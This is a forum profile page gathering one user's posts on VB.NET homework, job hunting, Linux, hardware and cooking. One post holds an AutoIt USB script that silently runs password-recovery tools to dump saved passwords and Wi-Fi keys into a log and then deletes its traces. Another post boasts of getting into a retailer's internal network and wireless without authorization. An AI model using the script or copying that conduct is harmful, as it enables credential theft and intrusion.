Jump to content

angelictorment

Active Members
  • Posts

    58
  • Joined

  • Last visited

Everything posted by angelictorment

  1. You forgot a few "words" there. 1.clumbzy ( I believe this is s'ppose to be Clumzy ) 2. difrent ( Could this be Different? ) 3. Not really a few words, but more of one GIANT run on, hell where does it begin and end at really? "did u git the case form a difrent laptop , or is that the compny that makes epc, my sister wants a laptop for her birthday , my dad dusnt want 2 git her a big one cuz she is clumbzy , ar epcs a durable" LoL! Is this what they teach in school now? I remember if I would talk or even spell like this I would have to write the correct sentence on the chalk board until the next morning. Kind of like Bart Simpson does, I guess this is what the world is coming to now, sad really.
  2. The EEEPC is made by Asus, they are basically small laptops that are made for internet and email browsing. They can be used for other things, like running linux and BT3 for penetration testing purposes. Not sure how durable they are as the reviews I've read on them arent that great as far as that goes.
  3. LoL! I really hate to restart an old topic. But I've been messing with AutoIT and one of my u3 drives for work. Well I wanted to make it easier to obtain passwords off of our networks and our clients networks when we are working on them. Anyhow I pulled out the old script and blew the dust off of it so to speak. Well now I can't get it to run right... Here is the code I'm using, maybe someone can point to me the error that I'm just not seeing. Any and all help is appreciated. The error I keep rec'n is Line 1: Run(@ComSpec & '/k "pspv.exe /stext .takepspv.txt"', @ScriptDir, @SW_HIDE) Error: Unknown Command. Run(@ComSpec & ' /k "pspv.exe /stext .takepspv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "WirelessKeyView.exe /stext .takeWireless.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "mspass.exe /stext .takemspass.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "mailpv.exe /stext .takemailpv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "iepv.exe /stext .takeiepass.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Run(@ComSpec & ' /k "COPY .take*.txt .takeall.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC Dim $Location = @WorkingDir & '.take' Dim $FileName = "all.txt" FileMove($Location & $FileName , $Location & $DateTime & ".log",1) sleep(3000) Run(@ComSpec & ' /k "del .take*.txt"', @ScriptDir, @SW_HIDE) sleep(1000) Run(@ComSpec & ' /k "process.exe -k cmd.exe"', @ScriptDir, @SW_HIDE) sleep(1000)
  4. Well no, I just need some pointers and some input is all and a litl help along the way. This class I'm in is only 5 weeks long. Crash courses suck a$$ is all... Just wait for this next project, I think I have it done already though, I haven't tested it yet. Decimal to Binary Converter. But I'd also like to take it one step further and convert Binary to Decimal. Anyhow thanx for the help Psycho.... jool- I think I get what your saying. Thank you also...
  5. At the current moment I'm running a gaming system using the P5N32 SLI Deluxe from Asus. I've had no problems with it since I've had it, nor downloading drivers from them. I don't know about integrated graphics though, as I've never dealt with them except with my laptop. So I'm of no help there, but I'd go with either Asus, or eVGA is s'ppose to make a nice motherboard for the Conroe processor.
  6. Ok now I have this issue... But first. Ok everyone, wanted to say thanx for the links and the guidance. Now here is the rest of my issue. See code below. I need to find out how to get these numbers to also display in lstBox2 along with the symbols for + - * and /. Also need to know how to make it total everything up. Like what we have to do is 9+9 in lstBox2 and to get the answer I'd have to hit +,-,*, or / to make it show 9+9=19/ Since there is no equals key for this type of calculator. HELP please... Now for the code. Public Class frmCalculator Inherits System.Windows.Forms.Form Dim total1 As Integer Dim total2 As Integer Private Sub btnOne_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOne.Click txtDisplay.Text = txtDisplay.Text & btnOne.Text End Sub Private Sub btnTwo_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTwo.Click txtDisplay.Text = txtDisplay.Text & btnTwo.Text End Sub Private Sub cmdExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdExit.Click End End Sub Private Sub btnZero_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnZero.Click txtDisplay.Text = txtDisplay.Text & btnZero.Text End Sub Private Sub btnThree_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnThree.Click txtDisplay.Text = txtDisplay.Text & btnThree.Text End Sub Private Sub btnFour_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFour.Click txtDisplay.Text = txtDisplay.Text & btnFour.Text End Sub Private Sub btnFive_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFive.Click txtDisplay.Text = txtDisplay.Text & btnFive.Text End Sub Private Sub btnSix_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSix.Click txtDisplay.Text = txtDisplay.Text & btnSix.Text End Sub Private Sub btnSeven_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSeven.Click txtDisplay.Text = txtDisplay.Text & btnSeven.Text End Sub Private Sub btnEight_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnEight.Click txtDisplay.Text = txtDisplay.Text & btnEight.Text End Sub Private Sub btnNine_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnNine.Click txtDisplay.Text = txtDisplay.Text & btnNine.Text End Sub Private Sub btnPlus_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnPlus.Click total1 = total1 + Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub cmdClear_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdClear.Click txtDisplay.Clear() End Sub Private Sub btnSubtract_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSubtract.Click total1 = total1 - Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub btnMultiply_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnMultiply.Click total1 = total1 * Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub btnDivide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnDivide.Click total1 = total1 / Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub cmdClearList_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdClearList.Click lstBox2.ClearSelected() End Sub End Class
  7. Ok, thanx... :) Lets try and see then I can finish adding the rest of the code I hope.
  8. In the class definition? Hmmm... example please this is week 1 of VB for me... Also the error underlines all the lines.
  9. Ok I have to code an RPN Calculator for class for my Introduction to VB .NET Class. I've been trying to get this stupid thing to work for the past few days and I keep having issues. First I get this error "Statement not valid in a namespace." I can't find any help on this. Here is part of the coding please help. Thank You! Public Class frmCalculator Inherits System.Windows.Forms.Form Dim total1 As Integer Dim total2 As Integer End Class Private Sub btnOne_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOne.Click txtDisplay.Text = btnOne.Text End Sub Private Sub btnTwo_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTwo.Click txtDisplay.Text = btnTwo.Text End Sub Private Sub cmdExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdExit.Click End End Sub Private Sub btnZero_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnZero.Click txtDisplay.Text = btnZero.Text End Sub Private Sub btnThree_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnThree.Click txtDisplay.Text = btnThree.Text End Sub Private Sub btnFour_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFour.Click txtDisplay.Text = btnFour.Text End Sub Private Sub btnFive_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFive.Click txtDisplay.Text = btnFive.Text End Sub Private Sub btnSix_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSix.Click txtDisplay.Text = btnSix.Text End Sub Private Sub btnSeven_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSeven.Click txtDisplay.Text = btnSeven.Text End Sub Private Sub btnEight_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnEight.Click txtDisplay.Text = btnEight.Text End Sub Private Sub btnNine_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnNine.Click txtDisplay.Text = btnNine.Text End Sub
  10. I'm of all mixes but I'm not from Ireland so I'm of no help to ya... I'm French, Italian, German, Russian, Scotch, Irish, Cheerokee Indian
  11. I'm getting 7$/hr and no tips... grrrrrrrrrr
  12. LoL! Which company was that for? Cause WalMart used Java for they're quiz. Which was kind of silly cause when they first put the stupid computer thing... Well the thing that they call a computer in there it didn't have Sun Java on it. I went to start to do the questionaire thing and it said that java was required blah blah blah. I laughed and said out loud WTF?!?! is this a computer test for me to see if I know anything about computers or is this just something stupid that the corp. office forgot to install. Well come to find out it was neither. It was the stupid vendor that puts those in that forgot to set it up properly. But what was cool about it was the fact that with out java on it, you could view the rest of the stores network with it and see the tracking, billing and what not with it. Only cause with out java the questionaire screen wouldn't be up, so anyone could access anything. Any whats more stupid with walmart is I can get into they're wireless network out in the parking lot with my lappy with out even trying... Its "secured" the morons used the WEP or the WPA key as the wireless identifier... MORONS!
  13. Sparda your pretty much spot on with the "Can we trust" part. Those personality tests are the stupidest things I've ever seen here in the States. It took me 4 months here in Orlando to find a job since I moved here from a different part of Florida. Anyhow they ask stupid questions on the applications like "Do you like to work alone?"or "Are you willing to work overtime when needed?"or even "If you wittnessed a coworker taking something that they didn't pay for would you report it or leave it be?" Some of them even go as far as "Do you participate in extreme sports or activities?" And then they go as far as rewording the exact same questions to try and catch you lying on the whole thing. Its about the stupidest thing I've ever seen. Hell I was just denied a job with the Harley Davidson Company because my CREDIT score was too low. WTF?!?!?! My credit score wouldn't be low if I had a job to keep it up... DUH!
  14. Its just as bad trying to find a job here in the states. I live in Florida and ever since the hurricanes of 04 swept through all the jobs have been taken over by immigrants that will work for less than min wage like VAKO said. It kills us the students when we need jobs to pay for books, and supplies and what nots. Not to mention most of the IT jobs around here want 5+ yrs experience... I'm thinking WTF?!?!?! I'm 25 been building PC's since I was 13... How much more experience do I need, not to mention I run my own PC repair business around here. But thats not working to well either... I ended up getting a job at the Discovery Channel Store in a ritzy mall. Its not much but it does fill the pockets.
  15. I haven't tried ubuntu linux yet. I've just worked with Fedora Core, Redhat, and SuSE. Speaking of broadening horizons of linux. How is yellow dog? I'm thinking of going for debian next I'm not sure yet though.
  16. I personally don't blame them for changing the email addresses. For one those other email accounts don't belong to you and I am sure the owners of them would not be to happy to receive attacks upon they're mail servers. Nor to have them advertised out like that. More companies are using different email addresses on a different server to filter out spam and to hopefully protect they're servers along with you the consumer (in this case you weren't though). If I was a mod here I probably 99.9% am sure I would have done the exact same thing.
  17. Nope... I actually cut the potatos up and put them in a glass 9 x 13 pan with carrots and mushrooms and some onions sometimes... Sprinkle with Fresh Dill and put a few big globs of butter( about 3 tbsps) and cover with foil.. Put in oven on 350 and check regularly... Then for main coarse there is Cube Steak seasoned with Garlic, Season all, Paprika, and some herbs. That'll also go in the oven for about 15-20mins.
  18. Yeah I try to play around with it every chance I get but somethings just kind of scare me in there to mess with. I do know one tweak how ever it's s'ppose to speed up the shut down of windows. I've used it a few times, I think it is set up with my laptop actually I can't remember what all I have it set up on now.. :? Anyhow time to go cook dinner for the g/f... Potatos, Carrots, Butter, Dill and Shrooms :D
  19. BTW- speaking of google... WTF is up with all the BS when searching for something now? I keep getting forum posts that don't help, and pages of random bs and dead links?
  20. I knew there was some reason why I didn't like quicktime for windows.. I just couldn't put my finger on it... Wow! Sounds like a real mess to go through..
  21. LoL! Sparda yeah I think we all kinda bashed/slashed him for that one. But ya know that one really wasn't (to me) a simple question. More or less a dumb question that could have been answered quite well if he read the sticky's and used google more often than not. Remember everyone... GOOGLE is your FRIEND... MICROSLUT is the ENEMY! (Although I am guilty of using Microslut Windows XP but I do use Linux 90% of the time anyhow)
  22. Personally I think (coming from the noob enlistee stand point here) that the ones that really want to learn something need to look it up. I know I'm guilty of not looking things up sometimes but thats because its a general question. Like my last topic under hacks. It was a general question not looking for answers as to what to do or how to do it but how many there are. Somethings google just can't answer. I'm in no way really a noob when it comes to computers but as far as joinning this forum I am and I accept that title. Its just like calling a beginner surfer a kook or kuk. It really doesn't mean beginner or anything, its basically calling someone an asshole. They only get that title when they are out in the line up surfing around more advanced surfers than they are and can or could cause injury to themself or someone else... So you'll hear "Get outta my way KOOK/KUK" quite a bit out there. Anyhow enough rambling from me.
  23. Ok. I'm curious as to how many registry hacks or tweaks there are out there for Windows XP Pro and Home editions. I just recieved one on a website doing a test of my desktop pc's performance and it said I needed to adjust my receive buffer size. So I did it exactly like it said (no big deal I'm always messing with my reg.) and well guess what it doesn't work. Infact it actually diabled my internet viewing until I deleted the stupid DWORD Value.. But that got to my curiosity on exactly what all can be tweaked with the registry. I know theres one for gaining overclock for an nVidia graphics card, I use it all the time. So what others are there? *note this is all on my personal desktop and laptop.*
  24. I've got an espresso machine here at home just don't use it much. I'd have to say my favorite flavor is Irish Creme... I just can't find this in a frappucino... I would really like to find that...
  25. Well the reason for dual PSUs is for SLi... This way I'm not putting too much stress on the current PSU that is in use. It is also a 450W PSU. This would be far easier to do and cheaper to do than buying a supplemental PSU.
×
×
  • Create New...